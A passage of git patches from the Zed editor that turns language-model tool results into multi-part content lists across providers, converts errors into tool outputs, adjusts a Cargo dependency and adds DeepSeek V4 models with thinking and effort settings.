LanguageModelToolResult { + /// Concatenates all `Text` parts of the content, ignoring non-text parts. + pub fn text_contents(&self) -> String { + let mut buffer = String::new(); + for part in &self.content { + if let LanguageModelToolResultContent::Text(text) = part { + buffer.push_str(text); + } + } + buffer + } + + /// Returns true when there are no content parts, or every part is empty. + pub fn is_content_empty(&self) -> bool { + self.content.iter().all(|part| part.is_empty()) + } +} + +/// Serde helper that accepts both the legacy single-value shape and the new +/// array shape for `LanguageModelToolResult::content`, and normalizes both to +/// `Vec`. +mod tool_result_content_vec { + use super::LanguageModelToolResultContent; + use serde::{Deserialize, Deserializer, Serialize, Serializer}; + + pub fn serialize( + value: &Vec, + serializer: S, + ) -> Result + where + S: Serializer, + { + value.serialize(serializer) + } + + pub fn deserialize<'de, D>( + deserializer: D, + ) -> Result, D::Error> + where + D: Deserializer<'de>, + { + let value = serde_json::Value::deserialize(deserializer)?; + match value { + serde_json::Value::Array(items) => { + let mut out = Vec::with_capacity(items.len()); + for item in items { + out.push( + serde_json::from_value::(item) + .map_err(serde::de::Error::custom)?, + ); + } + Ok(out) + } + other => { + let single = serde_json::from_value::(other) + .map_err(serde::de::Error::custom)?; + Ok(vec![single]) + } + } + } +} + #[derive(Debug, Clone, Serialize, Eq, PartialEq, Hash)] pub enum LanguageModelToolResultContent { Text(Arc), @@ -231,21 +293,11 @@ pub enum MessageContent { } impl MessageContent { - pub fn to_str(&self) -> Option<&str> { - match self { - MessageContent::Text(text) => Some(text.as_str()), - MessageContent::Thinking { text, .. } => Some(text.as_str()), - MessageContent::RedactedThinking(_) => None, - MessageContent::ToolResult(tool_result) => tool_result.content.to_str(), - MessageContent::ToolUse(_) | MessageContent::Image(_) => None, - } - } - pub fn is_empty(&self) -> bool { match self { MessageContent::Text(text) => text.chars().all(|c| c.is_whitespace()), MessageContent::Thinking { text, .. } => text.chars().all(|c| c.is_whitespace()), - MessageContent::ToolResult(tool_result) => tool_result.content.is_empty(), + MessageContent::ToolResult(tool_result) => tool_result.is_content_empty(), MessageContent::RedactedThinking(_) | MessageContent::ToolUse(_) | MessageContent::Image(_) => false, @@ -277,8 +329,25 @@ pub struct LanguageModelRequestMessage { impl LanguageModelRequestMessage { pub fn string_contents(&self) -> String { let mut buffer = String::new(); - for string in self.content.iter().filter_map(|content| content.to_str()) { - buffer.push_str(string); + for content in &self.content { + match content { + MessageContent::Text(text) => { + buffer.push_str(text); + } + MessageContent::Thinking { text, .. } => { + buffer.push_str(text); + } + MessageContent::ToolResult(tool_result) => { + for part in &tool_result.content { + if let LanguageModelToolResultContent::Text(text) = part { + buffer.push_str(text); + } + } + } + MessageContent::RedactedThinking(_) + | MessageContent::ToolUse(_) + | MessageContent::Image(_) => {} + } } buffer } @@ -462,4 +531,90 @@ mod tests { _ => panic!("Expected Image variant"), } } + + #[test] + fn test_language_model_tool_result_content_vec_deserialization() { + // Legacy single-value shape is normalized to a Vec. + let json = serde_json::json!({ + "tool_use_id": "abc", + "tool_name": "echo", + "is_error": false, + "content": "hello", + "output": null, + }); + let result: LanguageModelToolResult = serde_json::from_value(json).unwrap(); + assert_eq!( + result.content, + vec![LanguageModelToolResultContent::Text(Arc::from("hello"))] + ); + + // Legacy wrapped single-value shape also works. + let json = serde_json::json!({ + "tool_use_id": "abc", + "tool_name": "echo", + "is_error": false, + "content": {"type": "text", "text": "hello"}, + "output": null, + }); + let result: LanguageModelToolResult = serde_json::from_value(json).unwrap(); + assert_eq!( + result.content, + vec![LanguageModelToolResultContent::Text(Arc::from("hello"))] + ); + + // New array shape with text + image deserializes into a Vec. + let json = serde_json::json!({ + "tool_use_id": "abc", + "tool_name": "echo", + "is_error": false, + "content": [ + {"type": "text", "text": "foo"}, + {"source": "data", "size": {"width": 1, "height": 2}} + ], + "output": null, + }); + let result: LanguageModelToolResult = serde_json::from_value(json).unwrap(); + assert_eq!(result.content.len(), 2); + assert_eq!( + result.content[0], + LanguageModelToolResultContent::Text(Arc::from("foo")) + ); + match &result.content[1] { + LanguageModelToolResultContent::Image(image) => { + assert_eq!(image.source.as_ref(), "data"); + } + _ => panic!("Expected Image variant"), + } + + // Round-tripping preserves multi-part content. + let roundtripped: LanguageModelToolResult = + serde_json::from_value(serde_json::to_value(&result).unwrap()).unwrap(); + assert_eq!(roundtripped, result); + } + + #[test] + fn test_string_contents_includes_all_tool_result_text_parts() { + let tool_result = LanguageModelToolResult { + tool_use_id: LanguageModelToolUseId::from("id".to_string()), + tool_name: Arc::from("tool"), + is_error: false, + content: vec![ + LanguageModelToolResultContent::Text(Arc::from("first ")), + LanguageModelToolResultContent::Image(LanguageModelImage::empty()), + LanguageModelToolResultContent::Text(Arc::from("second")), + ], + output: None, + }; + let message = LanguageModelRequestMessage { + role: Role::User, + content: vec![ + MessageContent::Text("prefix ".to_string()), + MessageContent::ToolResult(tool_result), + MessageContent::Text(" suffix".to_string()), + ], + cache: false, + reasoning_details: None, + }; + assert_eq!(message.string_contents(), "prefix first second suffix"); + } } diff --git a/crates/language_models/src/provider/bedrock.rs b/crates/language_models/src/provider/bedrock.rs index 1a8d477192ec55..fb48e7d73a20dc 100644 --- a/crates/language_models/src/provider/bedrock.rs +++ b/crates/language_models/src/provider/bedrock.rs @@ -918,9 +918,10 @@ pub fn into_bedrock( } MessageContent::ToolResult(tool_result) => { messages_contain_tool_content = true; - BedrockToolResultBlock::builder() - .tool_use_id(tool_result.tool_use_id.to_string()) - .content(match tool_result.content { + let mut builder = BedrockToolResultBlock::builder() + .tool_use_id(tool_result.tool_use_id.to_string()); + for part in tool_result.content { + let block = match part { LanguageModelToolResultContent::Text(text) => { BedrockToolResultContentBlock::Text(text.to_string()) } @@ -961,7 +962,10 @@ pub fn into_bedrock( } } } - }) + }; + builder = builder.content(block); + } + builder .status({ if tool_result.is_error { BedrockToolResultStatus::Error diff --git a/crates/language_models/src/provider/copilot_chat.rs b/crates/language_models/src/provider/copilot_chat.rs index db50f5161e397e..1fc1dc3ce4a098 100644 --- a/crates/language_models/src/provider/copilot_chat.rs +++ b/crates/language_models/src/provider/copilot_chat.rs @@ -868,23 +868,40 @@ fn into_copilot_chat( Role::User => { for content in &message.content { if let MessageContent::ToolResult(tool_result) = content { - let content = match &tool_result.content { - LanguageModelToolResultContent::Text(text) => text.to_string().into(), - LanguageModelToolResultContent::Image(image) => { - if model.supports_vision() { - ChatMessageContent::Multipart(vec![ChatMessagePart::Image { - image_url: ImageUrl { - url: image.to_base64_url(), - }, - }]) - } else { - debug_panic!( - "This should be caught at {} level", - tool_result.tool_name - ); - "[Tool responded with an image, but this model does not support vision]".to_string().into() + let parts: Vec = tool_result + .content + .iter() + .map(|part| match part { + LanguageModelToolResultContent::Text(text) => { + ChatMessagePart::Text { + text: text.to_string(), + } } + LanguageModelToolResultContent::Image(image) => { + if model.supports_vision() { + ChatMessagePart::Image { + image_url: ImageUrl { + url: image.to_base64_url(), + }, + } + } else { + debug_panic!( + "This should be caught at {} level", + tool_result.tool_name + ); + ChatMessagePart::Text { + text: "[Tool responded with an image, but this model does not support vision]".to_string(), + } + } + } + }) + .collect(); + + let content = match parts.as_slice() { + [ChatMessagePart::Text { text }] => { + ChatMessageContent::Plain(text.clone()) } + _ => ChatMessageContent::Multipart(parts), }; messages.push(ChatMessage::Tool { @@ -1088,27 +1105,39 @@ fn into_copilot_responses( Role::User => { for content in &message.content { if let MessageContent::ToolResult(tool_result) = content { - let output = match &tool_result.content { - LanguageModelToolResultContent::Text(text) => { + let output = match tool_result.content.as_slice() { + [LanguageModelToolResultContent::Text(text)] => { responses::ResponseFunctionOutput::Text(text.to_string()) } - LanguageModelToolResultContent::Image(image) => { - if model.supports_vision() { - responses::ResponseFunctionOutput::Content(vec![ - responses::ResponseInputContent::InputImage { - image_url: Some(image.to_base64_url()), - detail: Default::default(), - }, - ]) - } else { - debug_panic!( - "This should be caught at {} level", - tool_result.tool_name - ); - responses::ResponseFunctionOutput::Text( - "[Tool responded with an image, but this model does not support vision]".into(), - ) - } + _ => { + let parts = tool_result + .content + .iter() + .map(|part| match part { + LanguageModelToolResultContent::Text(text) => { + responses::ResponseInputContent::InputText { + text: text.to_string(), + } + } + LanguageModelToolResultContent::Image(image) => { + if model.supports_vision() { + responses::ResponseInputContent::InputImage { + image_url: Some(image.to_base64_url()), + detail: Default::default(), + } + } else { + debug_panic!( + "This should be caught at {} level", + tool_result.tool_name + ); + responses::ResponseInputContent::InputText { + text: "[Tool responded with an image, but this model does not support vision]".to_string(), + } + } + } + }) + .collect(); + responses::ResponseFunctionOutput::Content(parts) } }; diff --git a/crates/language_models/src/provider/deepseek.rs b/crates/language_models/src/provider/deepseek.rs index dfc8521154e17a..a08cc25c7b5fb0 100644 --- a/crates/language_models/src/provider/deepseek.rs +++ b/crates/language_models/src/provider/deepseek.rs @@ -378,15 +378,26 @@ pub fn into_deepseek( } } MessageContent::ToolResult(tool_result) => { - match &tool_result.content { - LanguageModelToolResultContent::Text(text) => { - messages.push(deepseek::RequestMessage::Tool { - content: text.to_string(), - tool_call_id: tool_result.tool_use_id.to_string(), - }); + let mut text_parts: Vec = Vec::new(); + for part in &tool_result.content { + match part { + LanguageModelToolResultContent::Text(text) => { + text_parts.push(text.to_string()); + } + LanguageModelToolResultContent::Image(_) => { + text_parts.push("[Tool responded with an image]".to_string()); + } } - LanguageModelToolResultContent::Image(_) => {} + } + let content = if text_parts.is_empty() { + "".to_string() + } else { + text_parts.join("\n") }; + messages.push(deepseek::RequestMessage::Tool { + content, + tool_call_id: tool_result.tool_use_id.to_string(), + }); } } } diff --git a/crates/language_models/src/provider/lmstudio.rs b/crates/language_models/src/provider/lmstudio.rs index f035e765f0737d..50ac12865240e4 100644 --- a/crates/language_models/src/provider/lmstudio.rs +++ b/crates/language_models/src/provider/lmstudio.rs @@ -380,21 +380,25 @@ impl LmStudioLanguageModel { } } MessageContent::ToolResult(tool_result) => { - let content = match &tool_result.content { - LanguageModelToolResultContent::Text(text) => { - vec![lmstudio::MessagePart::Text { - text: text.to_string(), - }] - } - LanguageModelToolResultContent::Image(image) => { - vec![lmstudio::MessagePart::Image { - image_url: lmstudio::ImageUrl { - url: image.to_base64_url(), - detail: None, - }, - }] - } - }; + let content: Vec = tool_result + .content + .iter() + .map(|part| match part { + LanguageModelToolResultContent::Text(text) => { + lmstudio::MessagePart::Text { + text: text.to_string(), + } + } + LanguageModelToolResultContent::Image(image) => { + lmstudio::MessagePart::Image { + image_url: lmstudio::ImageUrl { + url: image.to_base64_url(), + detail: None, + }, + } + } + }) + .collect(); messages.push(lmstudio::ChatMessage::Tool { content: content.into(), diff --git a/crates/language_models/src/provider/mistral.rs b/crates/language_models/src/provider/mistral.rs index cce5448b9938e3..403d94e9832178 100644 --- a/crates/language_models/src/provider/mistral.rs +++ b/crates/language_models/src/provider/mistral.rs @@ -390,14 +390,19 @@ pub fn into_mistral( // Tool use is not supported in User messages for Mistral } MessageContent::ToolResult(tool_result) => { - let tool_content = match &tool_result.content { - LanguageModelToolResultContent::Text(text) => text.to_string(), - LanguageModelToolResultContent::Image(_) => { - "[Tool responded with an image, but Zed doesn't support these in Mistral models yet]".to_string() + let mut text_parts: Vec = Vec::new(); + for part in &tool_result.content { + match part { + LanguageModelToolResultContent::Text(text) => { + text_parts.push(text.to_string()); + } + LanguageModelToolResultContent::Image(_) => { + text_parts.push("[Tool responded with an image, but Zed doesn't support these in Mistral models yet]".to_string()); + } } - }; + } messages.push(mistral::RequestMessage::Tool { - content: tool_content, + content: text_parts.join("\n"), tool_call_id: tool_result.tool_use_id.to_string(), }); } diff --git a/crates/language_models/src/provider/ollama.rs b/crates/language_models/src/provider/ollama.rs index 229b59e2bfded2..f38321b7c88187 100644 --- a/crates/language_models/src/provider/ollama.rs +++ b/crates/language_models/src/provider/ollama.rs @@ -363,7 +363,7 @@ impl OllamaLanguageModel { MessageContent::ToolResult(tool_result) => { messages.push(ChatMessage::Tool { tool_name: tool_result.tool_name.to_string(), - content: tool_result.content.to_str().unwrap_or("").to_string(), + content: tool_result.text_contents(), }) } _ => unreachable!("Only tool result should be extracted"), diff --git a/crates/language_models/src/provider/open_router.rs b/crates/language_models/src/provider/open_router.rs index 6562d9de085229..bc4fbcc9aa761d 100644 --- a/crates/language_models/src/provider/open_router.rs +++ b/crates/language_models/src/provider/open_router.rs @@ -465,18 +465,22 @@ pub fn into_open_router( } } MessageContent::ToolResult(tool_result) => { - let content = match &tool_result.content { - LanguageModelToolResultContent::Text(text) => { - vec![open_router::MessagePart::Text { - text: text.to_string(), - }] - } - LanguageModelToolResultContent::Image(image) => { - vec![open_router::MessagePart::Image { - image_url: image.to_base64_url(), - }] - } - }; + let content: Vec = tool_result + .content + .iter() + .map(|part| match part { + LanguageModelToolResultContent::Text(text) => { + open_router::MessagePart::Text { + text: text.to_string(), + } + } + LanguageModelToolResultContent::Image(image) => { + open_router::MessagePart::Image { + image_url: image.to_base64_url(), + } + } + }) + .collect(); messages.push(open_router::RequestMessage::Tool { content: content.into(), diff --git a/crates/open_ai/src/completion.rs b/crates/open_ai/src/completion.rs index 3068f57f582db1..4abc752c4d5b65 100644 --- a/crates/open_ai/src/completion.rs +++ b/crates/open_ai/src/completion.rs @@ -104,21 +104,21 @@ pub fn into_open_ai( } } MessageContent::ToolResult(tool_result) => { - let content = match &tool_result.content { - LanguageModelToolResultContent::Text(text) => { - vec![MessagePart::Text { + let content: Vec = tool_result + .content + .iter() + .map(|part| match part { + LanguageModelToolResultContent::Text(text) => MessagePart::Text { text: text.to_string(), - }] - } - LanguageModelToolResultContent::Image(image) => { - vec![MessagePart::Image { + }, + LanguageModelToolResultContent::Image(image) => MessagePart::Image { image_url: ImageUrl { url: image.to_base64_url(), detail: None, }, - }] - } - }; + }, + }) + .collect(); messages.push(crate::RequestMessage::Tool { content: content.into(), @@ -270,21 +270,34 @@ fn append_message_to_response_items( } MessageContent::ToolResult(tool_result) => { flush_response_parts(&message.role, index, &mut content_parts, input_items); + let output = match tool_result.content.as_slice() { + [LanguageModelToolResultContent::Text(text)] => { + ResponseFunctionCallOutputContent::Text(text.to_string()) + } + _ => { + let parts = tool_result + .content + .into_iter() + .map(|part| match part { + LanguageModelToolResultContent::Text(text) => { + ResponseInputContent::Text { + text: text.to_string(), + } + } + LanguageModelToolResultContent::Image(image) => { + ResponseInputContent::Image { + image_url: image.to_base64_url(), + } + } + }) + .collect(); + ResponseFunctionCallOutputContent::List(parts) + } + }; input_items.push(ResponseInputItem::FunctionCallOutput( ResponseFunctionCallOutputItem { call_id: tool_result.tool_use_id.to_string(), - output: match tool_result.content { - LanguageModelToolResultContent::Text(text) => { - ResponseFunctionCallOutputContent::Text(text.to_string()) - } - LanguageModelToolResultContent::Image(image) => { - ResponseFunctionCallOutputContent::List(vec![ - ResponseInputContent::Image { - image_url: image.to_base64_url(), - }, - ]) - } - }, + output, }, )); } @@ -933,7 +946,7 @@ mod tests { tool_use_id: tool_call_id, tool_name: Arc::from("get_weather"), is_error: false, - content: LanguageModelToolResultContent::Text(Arc::from("Sunny")), + content: vec![LanguageModelToolResultContent::Text(Arc::from("Sunny"))], output: Some(json!({ "forecast": "Sunny" })), }; let user_image = LanguageModelImage { @@ -1634,7 +1647,7 @@ mod tests { tool_use_id: tool_use_id, tool_name: Arc::from("search"), is_error: false, - content: LanguageModelToolResultContent::Text(Arc::from("result")), + content: vec![LanguageModelToolResultContent::Text(Arc::from("result"))], output: None, }; let request = LanguageModelRequest { From f2c5ee7ba7500faf33b584af7398f0e9223f32ec Mon Sep 17 00:00:00 2001 From: Ben Brandt Date: Mon, 27 Apr 2026 15:03:33 +0200 Subject: [PATCH 058/231] Implement tool result conversion for anyhow errors (#55001) Self-Review Checklist: - [x] I've reviewed my own diff for quality, security, and reliability - [x] Unsafe blocks (if any) have justifying comments - [x] The content is consistent with the [UI/UX checklist](https://github.com/zed-industries/zed/blob/main/CONTRIBUTING.md#uiux-checklist) - [x] Tests cover the new/changed behavior - [x] Performance impact has been considered and is acceptable Release Notes: - N/A --- crates/agent/src/thread.rs | 29 ++++++++++--------- .../src/tools/context_server_registry.rs | 21 ++++++++------ crates/language_model_core/src/request.rs | 6 ++++ 3 files changed, 34 insertions(+), 22 deletions(-) diff --git a/crates/agent/src/thread.rs b/crates/agent/src/thread.rs index 2a8a6a5b3cb290..07e6facb1fba89 100644 --- a/crates/agent/src/thread.rs +++ b/crates/agent/src/thread.rs @@ -2448,9 +2448,10 @@ impl Thread { .collect(); (false, output) } else { - let output = AgentToolOutput::from_error( + let output = anyhow::anyhow!( "Attempted to read an image, but this model doesn't support it.", - ); + ) + .into(); (true, output) } } else { @@ -3426,14 +3427,15 @@ pub struct AgentToolOutput { pub raw_output: serde_json::Value, } -impl AgentToolOutput { - pub fn from_error(message: impl Into) -> Self { - let message = message.into(); - let llm_output = vec![LanguageModelToolResultContent::Text(Arc::from( - message.as_str(), - ))]; +impl From for AgentToolOutput { + fn from(error: anyhow::Error) -> Self { + let llm_output = vec![error.into()]; + let raw_output = serde_json::to_value(&llm_output).unwrap_or_else(|e| { + log::error!("Failed to serialize tool output: {e}"); + serde_json::Value::Null + }); Self { - raw_output: serde_json::Value::String(message), + raw_output, llm_output, } } @@ -3512,12 +3514,13 @@ where let task = self.0.clone().run(tool_input, event_stream, cx); cx.spawn(async move |_cx| match task.await { Ok(output) => { - let raw_output = serde_json::to_value(&output).map_err(|e| { - AgentToolOutput::from_error(format!("Failed to serialize tool output: {e}")) - })?; + let raw_output = serde_json::to_value(&output).unwrap_or_else(|e| { + log::error!("Failed to serialize tool output: {e}"); + serde_json::Value::Null + }); Ok(AgentToolOutput { - llm_output: vec![output.into()], raw_output, + llm_output: vec![output.into()], }) } Err(error_output) => { diff --git a/crates/agent/src/tools/context_server_registry.rs b/crates/agent/src/tools/context_server_registry.rs index c5476d6343d188..261c89e6b80e7d 100644 --- a/crates/agent/src/tools/context_server_registry.rs +++ b/crates/agent/src/tools/context_server_registry.rs @@ -337,7 +337,7 @@ impl AnyAgentTool for ContextServerTool { cx: &mut App, ) -> Task> { let Some(server) = self.store.read(cx).get_running_server(&self.server_id) else { - return Task::ready(Err(AgentToolOutput::from_error("Context server not found"))); + return Task::ready(Err(anyhow::anyhow!("Context server not found").into())); }; let tool_name = self.tool.name.clone(); let tool_id = mcp_tool_id(&self.server_id.0, &self.tool.name); @@ -347,14 +347,17 @@ impl AnyAgentTool for ContextServerTool { event_stream.authorize_third_party_tool(initial_title, tool_id, display_name, cx); cx.spawn(async move |_cx| { - let input = input.recv().await.map_err(|e| { - AgentToolOutput::from_error(format!("Failed to receive tool input: {e}")) - })?; + let input = input + .recv() + .await + .map_err(|e| anyhow::anyhow!(format!("Failed to receive tool input: {e}")))?; - authorize.await.map_err(|e| AgentToolOutput::from_error(e.to_string()))?; + authorize + .await + .map_err(|e| anyhow::anyhow!(e.to_string()))?; let Some(protocol) = server.client() else { - return Err(AgentToolOutput::from_error("Context server not initialized")); + return Err(anyhow::anyhow!("Context server not initialized").into()); }; let arguments = if let serde_json::Value::Object(map) = input { @@ -378,16 +381,16 @@ impl AnyAgentTool for ContextServerTool { ); let response = futures::select! { - response = request.fuse() => response.map_err(|e| AgentToolOutput::from_error(e.to_string()))?, + response = request.fuse() => response?, _ = event_stream.cancelled_by_user().fuse() => { - return Err(AgentToolOutput::from_error("MCP tool cancelled by user")); + return Err(anyhow::anyhow!("MCP tool cancelled by user").into()); } }; if response.is_error == Some(true) { let error_message: String = response.content.iter().filter_map(|c| c.text()).collect(); - return Err(AgentToolOutput::from_error(error_message)); + return Err(anyhow::anyhow!(error_message).into()); } let mut llm_output = Vec::new(); diff --git a/crates/language_model_core/src/request.rs b/crates/language_model_core/src/request.rs index f352ce16d227d6..b2b42c091bcc7f 100644 --- a/crates/language_model_core/src/request.rs +++ b/crates/language_model_core/src/request.rs @@ -273,6 +273,12 @@ impl From for LanguageModelToolResultContent { } } +impl From for LanguageModelToolResultContent { + fn from(error: anyhow::Error) -> Self { + Self::Text(Arc::from(error.to_string())) + } +} + impl From for LanguageModelToolResultContent { fn from(image: LanguageModelImage) -> Self { Self::Image(image) From 8cec8b74ef192dcababe339fd42a5ab327377491 Mon Sep 17 00:00:00 2001 From: Finn Evers Date: Mon, 27 Apr 2026 15:30:00 +0200 Subject: [PATCH 059/231] compliance: Fix futures dependency (#55003) We need this nowaways outside of the octocrab feature too Release Notes: - N/A --- tooling/compliance/Cargo.toml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/tooling/compliance/Cargo.toml b/tooling/compliance/Cargo.toml index 9b1ade359daa4b..f98fef63053a0d 100644 --- a/tooling/compliance/Cargo.toml +++ b/tooling/compliance/Cargo.toml @@ -9,13 +9,13 @@ license = "GPL-3.0-or-later" workspace = true [features] -octo-client = ["dep:octocrab", "dep:jsonwebtoken", "dep:futures", "dep:tokio"] +octo-client = ["dep:octocrab", "dep:jsonwebtoken", "dep:tokio"] [dependencies] anyhow.workspace = true async-trait.workspace = true derive_more.workspace = true -futures = { workspace = true, optional = true } +futures.workspace = true itertools.workspace = true jsonwebtoken = { version = "10.2", features = ["use_pem"], optional = true } octocrab = { version = "0.49", default-features = false, features = [ From 5d25a9b036028d55c8fa7a06c9633642f069a177 Mon Sep 17 00:00:00 2001 From: Xiaobo Liu Date: Mon, 27 Apr 2026 21:50:00 +0800 Subject: [PATCH 060/231] deepseek: Add deepseek-v4-pro & deepseek-v4-flash (#54731) reference: https://api-docs.deepseek.com/ Release Notes: - Added deepseek-v4-pro and deepseek-v4-flash models --------- Signed-off-by: Xiaobo Liu Co-authored-by: Ben Brandt Co-authored-by: MrSubidubi --- crates/deepseek/src/deepseek.rs | 52 ++++++++---- .../language_models/src/provider/deepseek.rs | 82 ++++++++++++++++--- docs/src/ai/llm-providers.md | 17 ++-- 3 files changed, 118 insertions(+), 33 deletions(-) diff --git a/crates/deepseek/src/deepseek.rs b/crates/deepseek/src/deepseek.rs index 19e1f6c2466512..478195c68e6ba5 100644 --- a/crates/deepseek/src/deepseek.rs +++ b/crates/deepseek/src/deepseek.rs @@ -48,11 +48,11 @@ impl From for String { #[cfg_attr(feature = "schemars", derive(schemars::JsonSchema))] #[derive(Clone, Debug, Default, Serialize, Deserialize, PartialEq)] pub enum Model { - #[serde(rename = "deepseek-chat")] + #[serde(rename = "deepseek-v4-flash")] + V4Flash, + #[serde(rename = "deepseek-v4-pro")] #[default] - Chat, - #[serde(rename = "deepseek-reasoner")] - Reasoner, + V4Pro, #[serde(rename = "custom")] Custom { name: String, @@ -65,29 +65,29 @@ pub enum Model { impl Model { pub fn default_fast() -> Self { - Model::Chat + Model::V4Flash } pub fn from_id(id: &str) -> Result { match id { - "deepseek-chat" => Ok(Self::Chat), - "deepseek-reasoner" => Ok(Self::Reasoner), + "deepseek-v4-flash" => Ok(Self::V4Flash), + "deepseek-v4-pro" => Ok(Self::V4Pro), _ => anyhow::bail!("invalid model id {id}"), } } pub fn id(&self) -> &str { match self { - Self::Chat => "deepseek-chat", - Self::Reasoner => "deepseek-reasoner", + Self::V4Flash => "deepseek-v4-flash", + Self::V4Pro => "deepseek-v4-pro", Self::Custom { name, .. } => name, } } pub fn display_name(&self) -> &str { match self { - Self::Chat => "DeepSeek Chat", - Self::Reasoner => "DeepSeek Reasoner", + Self::V4Flash => "DeepSeek V4 Flash", + Self::V4Pro => "DeepSeek V4 Pro", Self::Custom { name, display_name, .. } => display_name.as_ref().unwrap_or(name).as_str(), @@ -96,16 +96,14 @@ impl Model { pub fn max_token_count(&self) -> u64 { match self { - Self::Chat | Self::Reasoner => 128_000, + Self::V4Flash | Self::V4Pro => 1_000_000, Self::Custom { max_tokens, .. } => *max_tokens, } } pub fn max_output_tokens(&self) -> Option { match self { - // Their API treats this max against the context window, which means we hit the limit a lot - // Using the default value of None in the API instead - Self::Chat | Self::Reasoner => None, + Self::V4Flash | Self::V4Pro => Some(384_000), Self::Custom { max_output_tokens, .. } => *max_output_tokens, @@ -123,11 +121,35 @@ pub struct Request { #[serde(default, skip_serializing_if = "Option::is_none")] pub temperature: Option, #[serde(default, skip_serializing_if = "Option::is_none")] + pub thinking: Option, + #[serde(default, skip_serializing_if = "Option::is_none")] + pub reasoning_effort: Option, + #[serde(default, skip_serializing_if = "Option::is_none")] pub response_format: Option, #[serde(default, skip_serializing_if = "Vec::is_empty")] pub tools: Vec, } +#[derive(Debug, Serialize, Deserialize)] +pub struct Thinking { + #[serde(rename = "type")] + pub kind: ThinkingType, +} + +#[derive(Debug, Serialize, Deserialize, Clone, Copy, Eq, PartialEq)] +#[serde(rename_all = "lowercase")] +pub enum ThinkingType { + Enabled, + Disabled, +} + +#[derive(Debug, Serialize, Deserialize, Clone, Copy, Eq, PartialEq)] +#[serde(rename_all = "lowercase")] +pub enum ReasoningEffort { + High, + Max, +} + #[derive(Debug, Serialize, Deserialize)] #[serde(rename_all = "snake_case")] pub enum ResponseFormat { diff --git a/crates/language_models/src/provider/deepseek.rs b/crates/language_models/src/provider/deepseek.rs index a08cc25c7b5fb0..9f10da20c124b5 100644 --- a/crates/language_models/src/provider/deepseek.rs +++ b/crates/language_models/src/provider/deepseek.rs @@ -1,5 +1,5 @@ use anyhow::{Result, anyhow}; -use collections::{BTreeMap, HashMap}; +use collections::{HashMap, IndexMap}; use credentials_provider::CredentialsProvider; use deepseek::DEEPSEEK_API_URL; @@ -9,10 +9,11 @@ use gpui::{AnyView, App, AsyncApp, Context, Entity, SharedString, Task, Window}; use http_client::HttpClient; use language_model::{ ApiKeyState, AuthenticateError, EnvVar, IconOrSvg, LanguageModel, LanguageModelCompletionError, - LanguageModelCompletionEvent, LanguageModelId, LanguageModelName, LanguageModelProvider, - LanguageModelProviderId, LanguageModelProviderName, LanguageModelProviderState, - LanguageModelRequest, LanguageModelToolChoice, LanguageModelToolResultContent, - LanguageModelToolUse, MessageContent, RateLimiter, Role, StopReason, TokenUsage, env_var, + LanguageModelCompletionEvent, LanguageModelEffortLevel, LanguageModelId, LanguageModelName, + LanguageModelProvider, LanguageModelProviderId, LanguageModelProviderName, + LanguageModelProviderState, LanguageModelRequest, LanguageModelToolChoice, + LanguageModelToolResultContent, LanguageModelToolUse, MessageContent, RateLimiter, Role, + StopReason, TokenUsage, env_var, }; pub use settings::DeepseekAvailableModel as AvailableModel; use settings::{Settings, SettingsStore}; @@ -164,10 +165,10 @@ impl LanguageModelProvider for DeepSeekLanguageModelProvider { } fn provided_models(&self, cx: &App) -> Vec> { - let mut models = BTreeMap::default(); + let mut models = IndexMap::default(); - models.insert("deepseek-chat", deepseek::Model::Chat); - models.insert("deepseek-reasoner", deepseek::Model::Reasoner); + models.insert("deepseek-v4-flash", deepseek::Model::V4Flash); + models.insert("deepseek-v4-pro", deepseek::Model::V4Pro); for available_model in &Self::settings(cx).available_models { models.insert( @@ -273,6 +274,32 @@ impl LanguageModel for DeepSeekLanguageModel { true } + fn supports_thinking(&self) -> bool { + matches!( + self.model, + deepseek::Model::V4Flash | deepseek::Model::V4Pro + ) + } + + fn supported_effort_levels(&self) -> Vec { + if !self.supports_thinking() { + return Vec::new(); + } + + vec![ + LanguageModelEffortLevel { + name: "High".into(), + value: "high".into(), + is_default: true, + }, + LanguageModelEffortLevel { + name: "Max".into(), + value: "max".into(), + is_default: false, + }, + ] + } + fn supports_tool_choice(&self, _choice: LanguageModelToolChoice) -> bool { true } @@ -320,7 +347,10 @@ pub fn into_deepseek( model: &deepseek::Model, max_output_tokens: Option, ) -> deepseek::Request { - let is_reasoner = model == &deepseek::Model::Reasoner; + let thinking = deepseek_thinking(model, request.thinking_allowed); + let thinking_enabled = thinking + .as_ref() + .is_some_and(|thinking| thinking.kind == deepseek::ThinkingType::Enabled); let mut messages = Vec::new(); let mut current_reasoning: Option = None; @@ -408,11 +438,17 @@ pub fn into_deepseek( messages, stream: true, max_tokens: max_output_tokens, - temperature: if is_reasoner { + temperature: if thinking_enabled { None } else { request.temperature }, + thinking, + reasoning_effort: if thinking_enabled { + into_deepseek_reasoning_effort(request.thinking_effort.as_deref()) + } else { + None + }, response_format: None, tools: request .tools @@ -428,6 +464,32 @@ pub fn into_deepseek( } } +fn deepseek_thinking( + model: &deepseek::Model, + thinking_allowed: bool, +) -> Option { + let kind = match model { + deepseek::Model::V4Flash | deepseek::Model::V4Pro => { + if thinking_allowed { + deepseek::ThinkingType::Enabled + } else { + deepseek::ThinkingType::Disabled + } + } + deepseek::Model::Custom { .. } => return None, + }; + + Some(deepseek::Thinking { kind }) +} + +fn into_deepseek_reasoning_effort(effort: Option<&str>) -> Option { + match effort { + Some("high") => Some(deepseek::ReasoningEffort::High), + Some("max") => Some(deepseek::ReasoningEffort::Max), + _ => None, + } +} + pub struct DeepSeekEventMapper { tool_calls_by_index: HashMap, } diff --git a/docs/src/ai/llm-providers.md b/docs/src/ai/llm-providers.md index f5d6f345968434..fad9ace28aa5da 100644 --- a/docs/src/ai/llm-providers.md +++ b/docs/src/ai/llm-providers.md @@ -242,7 +242,7 @@ Zed will also use the `DEEPSEEK_API_KEY` environment variable if it's defined. #### Custom Models {#deepseek-custom-models} -The Zed agent comes pre-configured to use the latest version for common models (DeepSeek Chat, DeepSeek Reasoner). +The Zed agent comes pre-configured to use DeepSeek V4 Flash and DeepSeek V4 Pro. If you wish to use alternate models or customize the API endpoint, you can do so by adding the following to your Zed settings file ([how to edit](../configuring-zed.md#settings-files)): ```json [settings] @@ -252,15 +252,16 @@ If you wish to use alternate models or customize the API endpoint, you can do so "api_url": "https://api.deepseek.com", "available_models": [ { - "name": "deepseek-chat", - "display_name": "DeepSeek Chat", - "max_tokens": 64000 + "name": "deepseek-v4-flash", + "display_name": "DeepSeek V4 Flash", + "max_tokens": 1000000, + 